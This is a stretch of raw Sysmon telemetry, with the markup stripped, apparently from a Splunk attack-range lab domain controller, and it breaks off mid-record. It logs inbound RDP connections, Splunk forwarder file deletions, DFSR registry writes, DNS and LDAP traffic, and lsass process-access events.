SERVICEtcpfalsefalse185.100.87.94-58042-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099899Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:11.243{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-57812-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 23542300x800000000000000099907Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:16.662{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=461102E569CD611382CE4C235DD234A4,SHA256=EA6045BDD6732EDC48EB59B9BC3A409212EFF133CC2AEB78CBAD0671F057B52D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000099906Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:12.125{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-59554-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099905Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:11.792{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-58842-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 23542300x800000000000000099908Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:17.755{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49C61F45858941A74EABB9F4028FA21F,SHA256=052D2F39D83E6EA382C26198A86485C381CA82DDAFF338223B9E0C19AD3B7057,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099910Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:18.849{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DF1949211D0E5706E95DCB2A9F94FBB,SHA256=646B7EB84A891B6CFB6B503C857D3230880BE07A85C620400F8AAF2B70217BF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099909Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:18.537{326FD73D-A44C-6294-0501-000000005502}5164NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=29F4984D9A3F0C9901FC056FBA6C93C1,SHA256=0C82F0BA808DFB25A03BFA359B6BE47A59607D83579B4EFCC6B3276E0A91051F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099912Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:19.943{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A940AC29A9C0C102E8CC9972359DFF74,SHA256=234124B10AF7F269104F9B606A998D6E35B907E4D30F0E1494E03E219DB7BE60,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099911Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:19.084{326FD73D-A254-6294-1100-000000005502}104NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=CA6B83CB4B6D3E0DDA4F239FB22F76B8,SHA256=A8FF2E6D39AC1E7BF3CB5A0367D4AFC3BE73DB7B82B6A3EA6EB9C816D80525CB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000099913Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:17.167{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53339-false10.0.1.12-8000- 23542300x800000000000000099914Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:21.037{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD8138F397B04702CFF10DEC4E8D0EE5,SHA256=1B3B057A2243F42305BD4ABA4E54281F26E17197BEB465B2B2C1D872120F8D3C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099915Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:22.130{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1342439F078087ACC2F72EBB5DB7D414,SHA256=F852D30C6EF5A3ABD014D596CD6634107C5572A9CE703C2C7C2753507C220B70,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099917Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:23.677{326FD73D-A44C-6294-0501-000000005502}5164NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=B815FDBF3105A0143C61AE82F95AAF1E,SHA256=95D93950BC72E3B7DDB3127D4556C8DC830B74A59CF059DD284FB46B71551B09,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099916Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:23.224{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20BE75A3B51839AEF7D91B8B520031AD,SHA256=09E646C6FCF87E083FDA06E527931924541909E38DC666E58398530106D92A57,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099918Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:24.318{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F48EE036B3C5E146A8380A2BA1CFAB2,SHA256=DDC715BC442F776E89CB6EDDEBC9C06F14F7C02E00DC0B8FBBD8727C4EAE7860,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000099920Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:21.573{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53340-false10.0.1.12-8089- 23542300x800000000000000099919Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:25.427{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A1DD3E0587E1020F45768F401C3ABA0,SHA256=CB9EEEE57A7FC29F30D5CEEB90D5E3C3E44B4542319CB6D49493E898C2ED9D3C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099921Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:26.521{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A54151795FD425F50AA8E9EAE8DE7CA,SHA256=E16789C41F531F579ED6152EAE99C00A24A740A5688A43EB17FCA0896DD8412D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000099923Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:23.073{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53341-false10.0.1.12-8000- 23542300x800000000000000099922Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:27.615{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=618A6123D2224B5333B954B2EC74C050,SHA256=4238E044264083254B73159A560BF4C97F802E7B6BBC44A3B4DCC872700F503B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099924Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:28.708{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87D95B2EB442C36DC69B3403BAA7A7FE,SHA256=04522FD26D5DA19077B8A7E36F1412CAEA5DF1A3A4FCA7ECFBD28F4744103ACC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099925Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:29.818{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3EB0EC239A4CB3D3AE5016E70C167011,SHA256=D9F3D2F8BA66D622CE1A6A1EDF922CC709C3A4FDB3D99B0B36732D0F658BC9F5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099931Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:30.912{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2F7AF708E4849B44AE6D8B6E5A788B2,SHA256=B638D85DEAF367F33A05E64699D23DC45B3F8335D57CB348375243A0AA4D5564,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 13241300x800000000000000099930Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-SetValue2022-05-30 13:05:30.552{326FD73D-A262-6294-2900-000000005502}2896C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\16DF8A53-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_16DF8A53-0000-0000-0000-100000000000.XML 13241300x800000000000000099929Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-SetValue2022-05-30 13:05:30.537{326FD73D-A262-6294-2900-000000005502}2896C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\92512667-BFCB-4F03-88F3-5CBAAC70C21C\Config SourceDWORD (0x00000001) 13241300x800000000000000099928Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-SetValue2022-05-30 13:05:30.537{326FD73D-A262-6294-2900-000000005502}2896C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\92512667-BFCB-4F03-88F3-5CBAAC70C21C\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_92512667-BFCB-4F03-88F3-5CBAAC70C21C.XML 10341000x800000000000000099927Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:30.537{326FD73D-A253-6294-0B00-000000005502}632680C:\Windows\system32\lsass.exe{326FD73D-A262-6294-2900-000000005502}2896C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099926Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:30.537{326FD73D-A253-6294-0B00-000000005502}632680C:\Windows\system32\lsass.exe{326FD73D-A262-6294-2900-000000005502}2896C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x800000000000000099940Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:28.467{326FD73D-A262-6294-2A00-000000005502}2932C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-994.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-994.attackrange.local50053- 354300x800000000000000099939Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:28.465{326FD73D-A262-6294-2A00-000000005502}2932C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53478-false10.0.0.2ip-10-0-0-2.us-east-2.compute.internal53domain 354300x800000000000000099938Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:28.465{326FD73D-A262-6294-2A00-000000005502}2932C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-994.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-994.attackrange.local56925- 354300x800000000000000099937Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:28.465{326FD73D-A254-6294-1300-000000005502}984C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-994.attackrange.local56925-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-994.attackrange.local53domain 354300x800000000000000099936Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:28.450{326FD73D-A254-6294-0D00-000000005502}908C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:6d77:2ba8:d8c7:bf95win-dc-ctus-attack-range-994.attackrange.local53342-truefe80:0:0:0:6d77:2ba8:d8c7:bf95win-dc-ctus-attack-range-994.attackrange.local135epmap 354300x800000000000000099935Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:28.450{326FD73D-A262-6294-2900-000000005502}2896C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:6d77:2ba8:d8c7:bf95win-dc-ctus-attack-range-994.attackrange.local53342-truefe80:0:0:0:6d77:2ba8:d8c7:bf95win-dc-ctus-attack-range-994.attackrange.local135epmap 10341000x800000000000000099934Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:31.396{326FD73D-A253-6294-0B00-000000005502}632844C:\Windows\system32\lsass.exe{326FD73D-A262-6294-2900-000000005502}2896C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099933Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:31.396{326FD73D-A253-6294-0B00-000000005502}632844C:\Windows\system32\lsass.exe{326FD73D-A262-6294-2900-000000005502}2896C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099932Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:31.396{326FD73D-A253-6294-0B00-000000005502}632844C:\Windows\system32\lsass.exe{326FD73D-A262-6294-2900-000000005502}2896C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x800000000000000099948Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:29.307{326FD73D-A253-6294-0B00-000000005502}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53344-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local389ldap 354300x800000000000000099947Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:29.307{326FD73D-A262-6294-2900-000000005502}2896C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53344-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local389ldap 354300x800000000000000099946Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:29.011{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53343-false10.0.1.12-8000- 23542300x800000000000000099945Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:32.490{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B5EAB004D3DFDB783681C97EAF5ED28C,SHA256=431FE36977690FA18CBC4C51F0976A10128495878F5D6E5D632E5F8C0FED8DF0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000099944Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:32.240{326FD73D-A253-6294-0B00-000000005502}632680C:\Windows\system32\lsass.exe{326FD73D-A262-6294-2900-000000005502}2896C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099943Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:32.240{326FD73D-A253-6294-0B00-000000005502}632680C:\Windows\system32\lsass.exe{326FD73D-A262-6294-2900-000000005502}2896C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099942Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:32.240{326FD73D-A253-6294-0B00-000000005502}632680C:\Windows\system32\lsass.exe{326FD73D-A262-6294-2900-000000005502}2896C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000099941Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:32.005{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=320ED28F964D5944CFFAABBE2FC85412,SHA256=534680AEE7642D5F36067E5BABEC7D9C3B7F5AFD87FA458977CF1C6BFF418A88,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099949Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:33.099{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 